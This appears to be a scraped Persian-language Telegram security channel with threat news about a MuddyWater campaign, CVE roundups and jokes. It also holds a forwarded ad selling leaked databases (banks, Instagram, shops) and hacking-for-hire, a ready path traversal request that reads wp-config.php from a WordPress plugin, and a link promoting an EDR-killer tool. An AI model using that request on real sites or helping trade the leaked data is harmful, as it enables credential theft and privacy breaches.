گروه هکری ایرانی موسوم به آب گلآلود MuddyWater در قالب یک کمپین جدید با نام رمز «عملیات اولالامپو» (Operation Olalampo)، سازمانها و افراد متعددی را عمدتاً در منطقه خاورمیانه و شمال آفریقا (MENA) هدف قرار داده است. این فعالیت که از ۲۶ ژانویه ۲۰۲۶ رصد شده، منجر به استقرار خانوادههای جدیدی از بدافزار شده است؛ از جمله دانلودرهای (downloader) GhostFetch و HTTP_VIP، یک درپشتی (backdoor) مبتنی بر زبان برنامهنویسی Rust با نام CHAR، و یک ایمپلنت (implant) پیشرفته به نام GhostBackDoor. به گزارش شرکت Group-IB، زنجیره حملات با ارسال ایمیلهای فیشینگ (phishing) حاوی اسناد مایکروسافت آفیس آغاز میشود که کدهای ماکروی مخرب در آنها تعبیه شده و کنترل از راه دور سیستم قربانی را برای مهاجمان فراهم میکند.
تحلیل کد منبع بدافزار CHAR نشانههایی از توسعه با کمک هوش مصنوعی (AI) را آشکار کرده که با اطلاعات قبلی گوگل مبنی بر آزمایش این گروه با ابزارهای هوش مصنوعی مولد (generative AI) برای ساخت بدافزارهای سفارشی همخوانی دارد.
⭐️ @radvansec
تحلیل کد منبع بدافزار CHAR نشانههایی از توسعه با کمک هوش مصنوعی (AI) را آشکار کرده که با اطلاعات قبلی گوگل مبنی بر آزمایش این گروه با ابزارهای هوش مصنوعی مولد (generative AI) برای ساخت بدافزارهای سفارشی همخوانی دارد.
⭐️ @radvansec
❤6
Forwarded from Mr ghost
🔥فروش انواع دیتاب+س(پابلیک شده/پابلیک نشده
🔸دیتای اینستاگرام آپدیت (17M) رکورد
🔸قلم چی vip
🔸30 سایت فروشگاهی ایرانی vip
🔸اسنپ vip
🔸بانک کشاورزی و سپه vip
🔸20 شاپ ویتنامی vip
🔸10 شاپ هندی بزرگ vip
🔸5 شاپ رندوم vip
🔸مکتبخانه کامل دامپ شده vip
🔸سایت کاریابی کارگر vip
🔸نوبت دکتر مامائی vip
🔸تمامی دیتابیس های پابلیک
⛓انجام خدمات مجازی (ممبرزنی، سینزنی، ساخت ربات و ...)
⛓درخواستی (اوسینت و ه.ک)
⛓فیلتر شکن تک کاربره عالی
⛓شماره مجازی(اکانت قدیمی موجود)
⛓آموزش اوسینت
⛓آموزش وب ه.کینگ شامل:
Xss/Sql/ROE/Rfu
⛓انواع آموزش اسکن انواع شل
استعلام قیمت پیوی
🔸دیتای اینستاگرام آپدیت (17M) رکورد
🔸قلم چی vip
🔸30 سایت فروشگاهی ایرانی vip
🔸اسنپ vip
🔸بانک کشاورزی و سپه vip
🔸20 شاپ ویتنامی vip
🔸10 شاپ هندی بزرگ vip
🔸5 شاپ رندوم vip
🔸مکتبخانه کامل دامپ شده vip
🔸سایت کاریابی کارگر vip
🔸نوبت دکتر مامائی vip
🔸تمامی دیتابیس های پابلیک
⛓انجام خدمات مجازی (ممبرزنی، سینزنی، ساخت ربات و ...)
⛓درخواستی (اوسینت و ه.ک)
⛓فیلتر شکن تک کاربره عالی
⛓شماره مجازی(اکانت قدیمی موجود)
⛓آموزش اوسینت
⛓آموزش وب ه.کینگ شامل:
Xss/Sql/ROE/Rfu
⛓انواع آموزش اسکن انواع شل
استعلام قیمت پیوی
🗿5👎1🤯1🥱1👻1
Sin0x001
⛓آموزش وب ه.کینگ شامل:
Xss/Sql/ROE/Rfu
Xss/Sql/ROE/Rfu
لا به لای خدماتش آموزش وب هکینگ هم هست😂😂😂😂😂😂😂😂😂
❤4🗿4
RadvanSec
AI.pdf
کتاب ۲۷ فصل دارد ولی برای کسانی که امنیت کار میکنن این مسیر پیشنهاد میشه ابتدا با فصل ۱-۲ مفاهیم پایه شروع کنید بعد فصل ۱۹ یادگیری ماشین که مهمترین بخش هست و سپس فصل ۲۱ یادگیری عمیق قلب تپنده حملات مدرن رو میتونید پوشش بدید و در ادامه فصل های ۱۲-۱۴ شامل عدم قطعیت و احتمالا و سپس فصل ۲۲ یادگیری تقویتی و و درنهایت فصل ۲۷ فلسفه و اخلاقیات که میتونید گسیل بدید به مباحث امنیت
👍6🙏1
Forwarded from ARVIN
امروز به برسی آسیب پذیری Path Traversalدر پلاگین وردپرس WP Responsive Images می پردازیم
در سورس پارامتر src از کاربر دریافت میشه در اینجا هیچ وایتلیستی نیست در فانکشن sendFileحجت تموم میشه!
https://www.cve.org/CVERecord?id=CVE-2026-1557
در سورس پارامتر src از کاربر دریافت میشه در اینجا هیچ وایتلیستی نیست در فانکشن sendFileحجت تموم میشه!
https://www.cve.org/CVERecord?id=CVE-2026-1557
❤3
Forwarded from ARVIN
ARVIN
امروز به برسی آسیب پذیری Path Traversalدر پلاگین وردپرس WP Responsive Images می پردازیم در سورس پارامتر src از کاربر دریافت میشه در اینجا هیچ وایتلیستی نیست در فانکشن sendFileحجت تموم میشه! https://www.cve.org/CVERecord?id=CVE-2026-1557
GET /wp-content/plugins/wp-responsive-images/image_handler.php?src=../../../../wp-config.php HTTP/1.1
Host: localhost
❤6
حاج عباسو بفرستیم مذاکره با تریاژر های باگکراد 😂😂
P1 -> P999999999999999
تضمینی😂😂
P1 -> P999999999999999
تضمینی😂😂
🔥4😁3🤪2😎1
RadvanSec
حاج عباسو بفرستیم مذاکره با تریاژر های باگکراد 😂😂 P1 -> P999999999999999 تضمینی😂😂
Better Call Abbas
😁5🤪1
EDR Killer
با استفاده از یک اسیب پذیری در درایور wsftprm.sys آنتی ویروس ها و EDR رو از کار میندازه
https://github.com/ThanniKudam/TopazTerminator
تست کردید بگید ببینیم چطوره 👍
با استفاده از یک اسیب پذیری در درایور wsftprm.sys آنتی ویروس ها و EDR رو از کار میندازه
https://github.com/ThanniKudam/TopazTerminator
تست کردید بگید ببینیم چطوره 👍
GitHub
GitHub - ThanniKudam/TopazTerminator: Just another EDR killer
Just another EDR killer. Contribute to ThanniKudam/TopazTerminator development by creating an account on GitHub.
👍4❤1
1⃣ CVE-2026-2441:
Google Chrome Blink RCE
2⃣ CVE-2026-27896:
Bypassing Security Controls in MCP Go SDK
3⃣ CVE-2026-20841:
Windows Notepad RCE
4⃣ CVE-2026-20817:
Windows Error Reporting ALPC Privilege Escalation
5⃣ CVE-2026-25253:
Clawdbot/Moltbot/OpenClaw One-click RCE
⭐️ @radvansec
Google Chrome Blink RCE
2⃣ CVE-2026-27896:
Bypassing Security Controls in MCP Go SDK
3⃣ CVE-2026-20841:
Windows Notepad RCE
4⃣ CVE-2026-20817:
Windows Error Reporting ALPC Privilege Escalation
5⃣ CVE-2026-25253:
Clawdbot/Moltbot/OpenClaw One-click RCE
⭐️ @radvansec
❤4
برای روتر های Juniper سری PTS آسیب پذیری با کد شناسایی CVE-2026-21902 از نوع RCE منتشر شده است که به هکرها امکان اجرای کد با دسترسی ROOT و در نهایت کنترل کامل بر روی روتر را می دهد. ورژن های 25.4 دارای این آسیب پذیری می باشند .
⭐️ @RadvanSec
⭐️ @RadvanSec
❤3
RadvanSec
1⃣ CVE-2026-2441: Google Chrome Blink RCE 2⃣ CVE-2026-27896: Bypassing Security Controls in MCP Go SDK 3⃣ CVE-2026-20841: Windows Notepad RCE 4⃣ CVE-2026-20817: Windows Error Reporting ALPC Privilege Escalation 5⃣ CVE-2026-25253: Clawdbot/Moltbot/OpenClaw…
CVE-2026-2472
Unauthenticated and Stored Cross-Site Scripting (XSS) in google-cloud-aiplatform _genai/_evals_visualization (Vertex AI Python SDK) affecting Jupyter/Colab.
Technical PoC
Unauthenticated and Stored Cross-Site Scripting (XSS) in google-cloud-aiplatform _genai/_evals_visualization (Vertex AI Python SDK) affecting Jupyter/Colab.
Technical PoC
❤4👍1